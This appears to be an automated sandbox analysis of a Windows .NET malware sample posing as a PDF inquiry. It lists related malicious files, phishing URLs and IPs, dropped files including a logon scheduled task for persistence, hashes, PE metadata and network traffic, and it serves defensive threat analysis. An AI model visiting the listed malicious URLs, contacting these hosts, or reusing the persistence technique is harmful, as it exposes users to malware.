                                                  SQUARESPACEUS | TACA20210407.PDF.exe | Get hash | malicious | Browse
                                                  • 198.185.159.144
                                                  SQUARESPACEUS | New Order.exe | Get hash | malicious | Browse
                                                  • 198.49.23.144
                                                  SQUARESPACEUS | New Order.exe | Get hash | malicious | Browse
                                                  • 198.185.159.144
                                                  SQUARESPACEUS | SALINAN SWIFT PRA-PEMBAYARAN UNTUK PEMASANGAN.exe | Get hash | malicious | Browse
                                                  • 198.185.159.144
                                                  SQUARESPACEUS | DHL Shipping Documents.exe | Get hash | malicious | Browse
                                                  • 198.49.23.145
                                                  SQUARESPACEUS | New PO#700-20-HDO410444RF217,pdf.exe | Get hash | malicious | Browse
                                                  • 198.185.159.144
                                                  SQUARESPACEUS | New Month.exe | Get hash | malicious | Browse
                                                  • 198.185.159.144
                                                  SQUARESPACEUS | QUOTATION REQUEST.exe | Get hash | malicious | Browse
                                                  • 198.185.159.144
                                                  CLOUDFLARENETUS | PO NUMBER 3120386 3120393 SIGNED.exe | Get hash | malicious | Browse
                                                  • 1.2.3.4
                                                  CLOUDFLARENETUS | Cobro Juridico_07223243630_5643594_539661009070075_49874359_5059639084170590400_7272781644_pdf.exe | Get hash | malicious | Browse
                                                  • 172.67.222.176
                                                  CLOUDFLARENETUS | BL2659618800638119374.xls.exe | Get hash | malicious | Browse
                                                  • 172.67.222.176
                                                  CLOUDFLARENETUS | Purchase order and quote confirmation.exe | Get hash | malicious | Browse
                                                  • 172.67.222.176
                                                  CLOUDFLARENETUS | Confirm Order for SK TRIMS & INDUSTRIES_DK4571,pdf.exe | Get hash | malicious | Browse
                                                  • 172.67.188.154
                                                  CLOUDFLARENETUS | Re Confirm#U00ffthe invoice#U00ffthe payment slip.exe | Get hash | malicious | Browse
                                                  • 104.21.17.57
                                                  CLOUDFLARENETUS | SOA.exe | Get hash | malicious | Browse
                                                  • 104.21.19.200
                                                  CLOUDFLARENETUS | RFQ No A'4762GHTECHNICAL DETAILS.exe | Get hash | malicious | Browse
                                                  • 104.21.19.200
                                                  CLOUDFLARENETUS | GQ5JvPEI6c.exe | Get hash | malicious | Browse
                                                  • 104.21.17.57
                                                  CLOUDFLARENETUS | setupapp.exe | Get hash | malicious | Browse
                                                  • 172.67.164.1
                                                  CLOUDFLARENETUS | g2qwgG2xbe.exe | Get hash | malicious | Browse
                                                  • 172.67.161.4
                                                  CLOUDFLARENETUS | C++ Dropper.exe | Get hash | malicious | Browse
                                                  • 104.21.50.92
                                                  CLOUDFLARENETUS | 12042021493876783,xlsx.exe | Get hash | malicious | Browse
                                                  • 23.227.38.65
                                                  CLOUDFLARENETUS | JSTCG21040600210 xlxs.exe | Get hash | malicious | Browse
                                                  • 104.21.19.200
                                                  CLOUDFLARENETUS | PAYMENT RECEIPT.exe | Get hash | malicious | Browse
                                                  • 172.67.188.154
                                                  CLOUDFLARENETUS | PO5411.exe | Get hash | malicious | Browse
                                                  • 104.21.21.198
                                                  CLOUDFLARENETUS | COMMERCIAL INVOICE N#U00c2#U00ba 0001792E21.exe | Get hash | malicious | Browse
                                                  • 104.21.17.57
                                                  CLOUDFLARENETUS | 9479_pdf.exe | Get hash | malicious | Browse
                                                  • 172.67.222.176
                                                  CLOUDFLARENETUS | fyi.exe | Get hash | malicious | Browse
                                                  • 172.67.188.154
                                                  CLOUDFLARENETUS | inv.exe | Get hash | malicious | Browse
                                                  • 104.21.73.99
                                                  IDCFIDCFrontierIncJP | YPJ9DZYIpO | Get hash | malicious | Browse
                                                  • 61.203.182.242
                                                  IDCFIDCFrontierIncJP | ccavero@hycite.com.htm | Get hash | malicious | Browse
                                                  • 210.140.252.186
                                                  IDCFIDCFrontierIncJP | z2xQEFs54b.exe | Get hash | malicious | Browse
                                                  • 210.140.73.39
                                                  IDCFIDCFrontierIncJP | NEW ORDER.xlsx | Get hash | malicious | Browse
                                                  • 210.152.86.78
                                                  IDCFIDCFrontierIncJP | Swift File_pdf.exe | Get hash | malicious | Browse
                                                  • 210.152.86.78
                                                  IDCFIDCFrontierIncJP | Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Get hash | malicious | Browse
                                                  • 210.152.86.132
                                                  IDCFIDCFrontierIncJP | wEcncyxrEe | Get hash | malicious | Browse
                                                  • 202.230.13.241
                                                  IDCFIDCFrontierIncJP | Xy4f5rcxOm.dll | Get hash | malicious | Browse
                                                  • 164.46.102.68
                                                  IDCFIDCFrontierIncJP | 990109.exe | Get hash | malicious | Browse
                                                  • 210.140.73.39
                                                  IDCFIDCFrontierIncJP | https://performoverlyrefinedapplication.icu/CizCEYfXXsFZDea6dskVLfEdY6BHDc59rTngFTpi7WA?clck=d1b1d4dc-5066-446f-b596-331832cbbdd0&sid=l84343 | Get hash | malicious | Browse
                                                  • 202.241.208.4
                                                  IDCFIDCFrontierIncJP | http://perpetual.veteran.az/673616c6c792e64756e6e654070657270657475616c2e636f6d2e6175 | Get hash | malicious | Browse
                                                  • 202.241.208.56
                                                  IDCFIDCFrontierIncJP | SecuriteInfo.com.Trojan.DownLoader7.37706.14895.exe | Get hash | malicious | Browse
                                                  • 210.152.124.48
                                                  IDCFIDCFrontierIncJP | SecuriteInfo.com.Trojan.DownLoader7.37706.14895.exe | Get hash | malicious | Browse
                                                  • 210.152.124.48
                                                  IDCFIDCFrontierIncJP | qkN4OZWFG6.exe | Get hash | malicious | Browse
                                                  • 202.230.201.31
                                                  IDCFIDCFrontierIncJP | kvdYhqN3Nh.exe | Get hash | malicious | Browse
                                                  • 210.140.73.39
                                                  IDCFIDCFrontierIncJP | https://wolusozai.web.app/yuniri-%E9%AB%98%E9%BD%A2%E8%80%85-%E7%84%A1%E6%96%99%E3%82%A4%E3%83%A9%E3%82%B9%E3%83%88.html | Get hash | malicious | Browse
                                                  • 210.129.190.174
                                                  IDCFIDCFrontierIncJP | 3yhnaDfaxn.exe | Get hash | malicious | Browse
                                                  • 210.140.73.39
                                                  IDCFIDCFrontierIncJP | https://nursing-theory.org/theories-and-models/holistic-nursing.php | Get hash | malicious | Browse
                                                  • 202.241.208.55
                                                  IDCFIDCFrontierIncJP | http://lapolicegear.com/?msclkid=bff2b1b585fd11812fcaee88d4e2dc4d&utm_source=bing&utm_medium=cpc&utm_campaign=ECI%20-%20LA%20Police%20Gear%20-%20Branded&utm_term=lapg%20gear&utm_content=LAPG%20Branded | Get hash | malicious | Browse
                                                  • 202.241.208.100
                                                  IDCFIDCFrontierIncJP | http://www.fujikura-control.com | Get hash | malicious | Browse
                                                  • 210.140.44.93

                                                  JA3 Fingerprints

                                                  No context

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\INQUIRY 1820521 pdf.exe.log
                                                  Process: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
                                                  File Type: ASCII text, with CRLF line terminators
                                                  Category: modified
                                                  Size (bytes): 1314
                                                  Entropy (8bit): 5.350128552078965
                                                  Encrypted: false
                                                  SSDEEP: 24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                  MD5: 1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                  SHA1: B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                  SHA-256: 28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                  SHA-512: 95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                  Malicious: true
                                                  Reputation: high, very likely benign file
                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                                  C:\Users\user\AppData\Local\Temp\tmp7085.tmp
                                                  Process: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
                                                  File Type: XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category: dropped
                                                  Size (bytes): 1647
                                                  Entropy (8bit): 5.192992199210482
                                                  Encrypted: false
                                                  SSDEEP: 24:2dH4+SEqC/S7hblNMFp//rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBGyTtn:cbhK79lNQR/rydbz9I3YODOLNdq3n
                                                  MD5: FF62EF076287CFB81F8ED2C5EF6F9231
                                                  SHA1: 2C615B6431D0EA97DC0E72ABD637E4BD45B85E3E
                                                  SHA-256: 1744396F535974D7DF009A067FDCB0D34C03B44A10BD8FF3C3877F2D1AC74EF5
                                                  SHA-512: 111B8BAE573593D17A6C6F0CDD9D408CC28994F316DF17081D0A6C2466B906593938C8D6C952093458C70C5B4DA51717F6BFBE1FBBBA1C10B247DD321A2E8ED4
                                                  Malicious: true
                                                  Reputation: low
                                                  Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true
                                                  C:\Users\user\AppData\Roaming\YAhcdYrYHFkNNf.exe
                                                  Process: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
                                                  File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category: dropped
                                                  Size (bytes): 859648
                                                  Entropy (8bit): 7.488650786243638
                                                  Encrypted: false
                                                  SSDEEP: 12288:QgmBkzuw0TQD6dNxvJ9HuRfJDv0CATOcZOd5ln4T7luAHdu0RReBqJTN/D7adhAS:BEAuw0O6FuRfmCAf4j2tTHc0WqZBw
                                                  MD5: DD3AE15E952C239AE6D87C8374B3B460
                                                  SHA1: F8D9DACEB3FF1DADABF9051A04BB4356C370FBDE
                                                  SHA-256: 513357BE2837BB1211C3FE2A32D7E6CDECF75F6CF0DA1C2F0D198A38E3CDB759
                                                  SHA-512: E5813F6369FAA127D2BDE9AF907E7BB31CDE0665F16038E9B3796EF8A0BF227822F9FD84C15A5646B680F1080253BBCC0117A6F1EA1DBD9CEE275F081D341E28
                                                  Malicious: true
                                                  Antivirus:
                                                  • Antivirus: Metadefender, Detection: 19%, Browse
                                                  • Antivirus: ReversingLabs, Detection: 41%
                                                  Reputation: low
                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....s`..............P..............1... ...@....@.. ....................................@..................................1..S....@..p....................`....................................................... ............... ..H............text........ ...................... ..`.rsrc...p....@......................@..@.reloc.......`......................@..B.................1......H........>..........9........d............................................"L.=.0..-..9#.*R.%-.Zj.bb. <...]....v]...=....YAu.....=..g..U.....A.Y.m...FR.S.~)............g|#aV.hV..#.v.9......bV.[.e.....9....)X+.g...g....#.q.uH....../....I`..L:%..g.....g.l:-v...x.6U.e.../......N.A.A.u..G.........*.,...S...c...6.T!8...i4..Jz....P{.'+....c'...zBj....h...!..b.Y....^....zI.>......#...f..my......A.AqlG...f.`.-...g.G.}T..X ..J........*&...;.t.j.U^.BlR)T.4,...9MN?
                                                  C:\Users\user\AppData\Roaming\YAhcdYrYHFkNNf.exe:Zone.Identifier
                                                  Process: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
                                                  File Type: ASCII text, with CRLF line terminators
                                                  Category: dropped
                                                  Size (bytes): 26
                                                  Entropy (8bit): 3.95006375643621
                                                  Encrypted: false
                                                  SSDEEP: 3:ggPYV:rPYV
                                                  MD5: 187F488E27DB4AF347237FE461A079AD
                                                  SHA1: 6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256: 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512: 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious: false
                                                  Reputation: high, very likely benign file
                                                  Preview: [ZoneTransfer]....ZoneId=0

                                                  Static File Info

                                                  General

                                                  File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Entropy (8bit): 7.488650786243638
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                  • Windows Screen Saver (13104/52) 0.07%
                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                  File name: INQUIRY 1820521 pdf.exe
                                                  File size: 859648
                                                  MD5: dd3ae15e952c239ae6d87c8374b3b460
                                                  SHA1: f8d9daceb3ff1dadabf9051a04bb4356c370fbde
                                                  SHA256: 513357be2837bb1211c3fe2a32d7e6cdecf75f6cf0da1c2f0d198a38e3cdb759
                                                  SHA512: e5813f6369faa127d2bde9af907e7bb31cde0665f16038e9b3796ef8a0bf227822f9fd84c15a5646b680f1080253bbcc0117a6f1ea1dbd9cee275f081d341e28
                                                  SSDEEP: 12288:QgmBkzuw0TQD6dNxvJ9HuRfJDv0CATOcZOd5ln4T7luAHdu0RReBqJTN/D7adhAS:BEAuw0O6FuRfmCAf4j2tTHc0WqZBw
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....s`..............P..............1... ...@....@.. ....................................@................................

                                                  File Icon

                                                  Icon Hash: 00828e8e8686b000

                                                  Static PE Info

                                                  General

                                                  Entrypoint: 0x4d31ee
                                                  Entrypoint Section: .text
                                                  Digitally signed: false
                                                  Imagebase: 0x400000
                                                  Subsystem: windows gui
                                                  Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
                                                  DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                  Time Stamp: 0x607312B4 [Sun Apr 11 15:16:04 2021 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version: v4.0.30319
                                                  OS Version Major: 4
                                                  OS Version Minor: 0
                                                  File Version Major: 4
                                                  File Version Minor: 0
                                                  Subsystem Version Major: 4
                                                  Subsystem Version Minor: 0
                                                  Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

                                                  Entrypoint Preview

                                                  Instruction
                                                  jmp dword ptr [00402000h]
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al

                                                  Data Directories

                                                  Name | Virtual Address | Virtual Size | Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | 
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT | 0xd3198 | 0x53 | .text
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xd4000 | 0x670 | .rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | 
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | 
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xd6000 | 0xc | .reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | 
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | 
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | 
                                                  IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | 
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | 
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | 
                                                  IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | 
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | 

                                                  Sections

                                                  Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                  .text | 0x2000 | 0xd11f4 | 0xd1200 | False | 0.766435202481 | data | 7.49655840913 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                  .rsrc | 0xd4000 | 0x670 | 0x800 | False | 0.3427734375 | data | 3.61228309464 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc | 0xd6000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                  Resources

                                                  Name | RVA | Size | Type | Language | Country
                                                  RT_VERSION | 0xd40a0 | 0x3e0 | data | | 
                                                  RT_MANIFEST | 0xd4480 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | | 

                                                  Imports

                                                  DLL | Import
                                                  mscoree.dll | _CorExeMain

                                                  Version Infos

                                                  Description | Data
                                                  Translation | 0x0000 0x04b0
                                                  LegalCopyright | Copyright CodeUnit 2007
                                                  Assembly Version | 2007.8.28.1
                                                  InternalName | FormattableString.exe
                                                  FileVersion | 2007.08.28.1
                                                  CompanyName | CodeUnit
                                                  LegalTrademarks | 
                                                  Comments | Image Size Standardiser
                                                  ProductName | Image Size Standardiser
                                                  ProductVersion | 2007.08.28.1
                                                  FileDescription | Image Size Standardiser
                                                  OriginalFilename | FormattableString.exe

                                                  Network Behavior

                                                  Network Port Distribution

                                                  TCP Packets

                                                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                  Apr 12, 2021 09:43:23.605489969 CEST | 49732 | 80 | 192.168.2.4 | 210.152.87.233
                                                  Apr 12, 2021 09:43:23.893817902 CEST | 80 | 49732 | 210.152.87.233 | 192.168.2.4
                                                  Apr 12, 2021 09:43:23.894022942 CEST | 49732 | 80 | 192.168.2.4 | 210.152.87.233
                                                  Apr 12, 2021 09:43:23.894160032 CEST | 49732 | 80 | 192.168.2.4 | 210.152.87.233
                                                  Apr 12, 2021 09:43:24.183762074 CEST | 80 | 49732 | 210.152.87.233 | 192.168.2.4
                                                  Apr 12, 2021 09:43:24.183934927 CEST | 80 | 49732 | 210.152.87.233 | 192.168.2.4
                                                  Apr 12, 2021 09:43:24.183948040 CEST | 80 | 49732 | 210.152.87.233 | 192.168.2.4
                                                  Apr 12, 2021 09:43:24.184182882 CEST | 49732 | 80 | 192.168.2.4 | 210.152.87.233
                                                  Apr 12, 2021 09:43:24.184211969 CEST | 49732 | 80 | 192.168.2.4 | 210.152.87.233
                                                  Apr 12, 2021 09:43:24.476608992 CEST | 80 | 49732 | 210.152.87.233 | 192.168.2.4
                                                  Apr 12, 2021 09:43:44.543428898 CEST | 49740 | 80 | 192.168.2.4 | 198.185.159.144
                                                  Apr 12, 2021 09:43:44.678457975 CEST | 80 | 49740 | 198.185.159.144 | 192.168.2.4
                                                  Apr 12, 2021 09:43:44.678567886 CEST | 49740 | 80 | 192.168.2.4 | 198.185.159.144
                                                  Apr 12, 2021 09:43:44.678704023 CEST | 49740 | 80 | 192.168.2.4 | 198.185.159.144
                                                  Apr 12, 2021 09:43:44.813456059 CEST | 80 | 49740 | 198.185.159.144 | 192.168.2.4
                                                  Apr 12, 2021 09:43:44.813931942 CEST | 80 | 49740 | 198.185.159.144 | 192.168.2.4
                                                  Apr 12, 2021 09:43:44.813957930 CEST | 80 | 49740 | 198.185.159.144 | 192.168.2.4
                                                  Apr 12, 2021 09:43:44.813977003 CEST | 80 | 49740 | 198.185.159.144 | 192.168.2.4
                                                  Apr 12, 2021 09:43:44.813988924 CEST | 80 | 49740 | 198.185.159.144 | 192.168.2.4
                                                  Apr 12, 2021 09:43:44.814007044 CEST | 80 | 49740 | 198.185.159.144 | 192.168.2.4
                                                  Apr 12, 2021 09:43:44.814023972 CEST | 80 | 49740 | 198.185.159.144 | 192.168.2.4
                                                  Apr 12, 2021 09:43:44.814052105 CEST | 80 | 49740 | 198.185.159.144 | 192.168.2.4
                                                  Apr 12, 2021 09:43:44.814085007 CEST | 80 | 49740 | 198.185.159.144 | 192.168.2.4
                                                  Apr 12, 2021 09:43:44.814115047 CEST | 80 | 49740 | 198.185.159.144 | 192.168.2.4
                                                  Apr 12, 2021 09:43:44.814137936 CEST | 49740 | 80 | 192.168.2.4 | 198.185.159.144
                                                  Apr 12, 2021 09:43:44.814167023 CEST | 49740 | 80 | 192.168.2.4 | 198.185.159.144
                                                  Apr 12, 2021 09:43:44.814181089 CEST | 80 | 49740 | 198.185.159.144 | 192.168.2.4
                                                  Apr 12, 2021 09:43:44.814248085 CEST | 49740 | 80 | 192.168.2.4 | 198.185.159.144
                                                  Apr 12, 2021 09:43:44.814308882 CEST | 49740 | 80 | 192.168.2.4 | 198.185.159.144
                                                  Apr 12, 2021 09:43:44.946779966 CEST | 80 | 49740 | 198.185.159.144 | 192.168.2.4
                                                  Apr 12, 2021 09:43:44.946857929 CEST | 80 | 49740 | 198.185.159.144 | 192.168.2.4
                                                  Apr 12, 2021 09:43:44.946890116 CEST | 49740 | 80 | 192.168.2.4 | 198.185.159.144
                                                  Apr 12, 2021 09:43:44.946923971 CEST | 49740 | 80 | 192.168.2.4 | 198.185.159.144
                                                  Apr 12, 2021 09:43:44.946966887 CEST | 80 | 49740 | 198.185.159.144 | 192.168.2.4
                                                  Apr 12, 2021 09:43:44.947017908 CEST | 80 | 49740 | 198.185.159.144 | 192.168.2.4
                                                  Apr 12, 2021 09:43:44.947036982 CEST | 49740 | 80 | 192.168.2.4 | 198.185.159.144
                                                  Apr 12, 2021 09:43:44.947081089 CEST | 49740 | 80 | 192.168.2.4 | 198.185.159.144
                                                  Apr 12, 2021 09:43:44.947123051 CEST | 80 | 49740 | 198.185.159.144 | 192.168.2.4
                                                  Apr 12, 2021 09:43:44.947174072 CEST | 80 | 49740 | 198.185.159.144 | 192.168.2.4
                                                  Apr 12, 2021 09:43:44.947195053 CEST | 49740 | 80 | 192.168.2.4 | 198.185.159.144
                                                  Apr 12, 2021 09:43:44.947261095 CEST | 80 | 49740 | 198.185.159.144 | 192.168.2.4
                                                  Apr 12, 2021 09:43:44.947295904 CEST | 49740 | 80 | 192.168.2.4 | 198.185.159.144
                                                  Apr 12, 2021 09:43:44.947321892 CEST | 49740 | 80 | 192.168.2.4 | 198.185.159.144
                                                  Apr 12, 2021 09:43:44.947369099 CEST | 80 | 49740 | 198.185.159.144 | 192.168.2.4
                                                  Apr 12, 2021 09:43:44.947427988 CEST | 80 | 49740 | 198.185.159.144 | 192.168.2.4
                                                  Apr 12, 2021 09:43:44.947441101 CEST | 49740 | 80 | 192.168.2.4 | 198.185.159.144
                                                  Apr 12, 2021 09:43:44.947489023 CEST | 49740 | 80 | 192.168.2.4 | 198.185.159.144
                                                  Apr 12, 2021 09:43:44.947525978 CEST | 80 | 49740 | 198.185.159.144 | 192.168.2.4
                                                  Apr 12, 2021 09:43:44.947575092 CEST | 80 | 49740 | 198.185.159.144 | 192.168.2.4
                                                  Apr 12, 2021 09:43:44.947594881 CEST | 49740 | 80 | 192.168.2.4 | 198.185.159.144
                                                  Apr 12, 2021 09:43:44.947635889 CEST | 49740 | 80 | 192.168.2.4 | 198.185.159.144
                                                  Apr 12, 2021 09:43:44.947668076 CEST | 80 | 49740 | 198.185.159.144 | 192.168.2.4
                                                  Apr 12, 2021 09:43:44.947736979 CEST | 80 | 49740 | 198.185.159.144 | 192.168.2.4
                                                  Apr 12, 2021 09:43:44.947753906 CEST | 49740 | 80 | 192.168.2.4 | 198.185.159.144
                                                  Apr 12, 2021 09:43:44.947802067 CEST | 49740 | 80 | 192.168.2.4 | 198.185.159.144
                                                  Apr 12, 2021 09:43:44.947839975 CEST | 80 | 49740 | 198.185.159.144 | 192.168.2.4
                                                  Apr 12, 2021 09:43:44.947899103 CEST | 80 | 49740 | 198.185.159.144 | 192.168.2.4
                                                  Apr 12, 2021 09:43:44.947911024 CEST | 49740 | 80 | 192.168.2.4 | 198.185.159.144
                                                  Apr 12, 2021 09:43:44.947951078 CEST | 49740 | 80 | 192.168.2.4 | 198.185.159.144
                                                  Apr 12, 2021 09:43:44.947978020 CEST | 80 | 49740 | 198.185.159.144 | 192.168.2.4
                                                  Apr 12, 2021 09:43:44.948043108 CEST | 80 | 49740 | 198.185.159.144 | 192.168.2.4
                                                  Apr 12, 2021 09:43:44.948056936 CEST | 49740 | 80 | 192.168.2.4 | 198.185.159.144
                                                  Apr 12, 2021 09:43:44.948103905 CEST | 49740 | 80 | 192.168.2.4 | 198.185.159.144
                                                  Apr 12, 2021 09:43:44.948132992 CEST | 80 | 49740 | 198.185.159.144 | 192.168.2.4
                                                  Apr 12, 2021 09:43:44.948187113 CEST | 80 | 49740 | 198.185.159.144 | 192.168.2.4
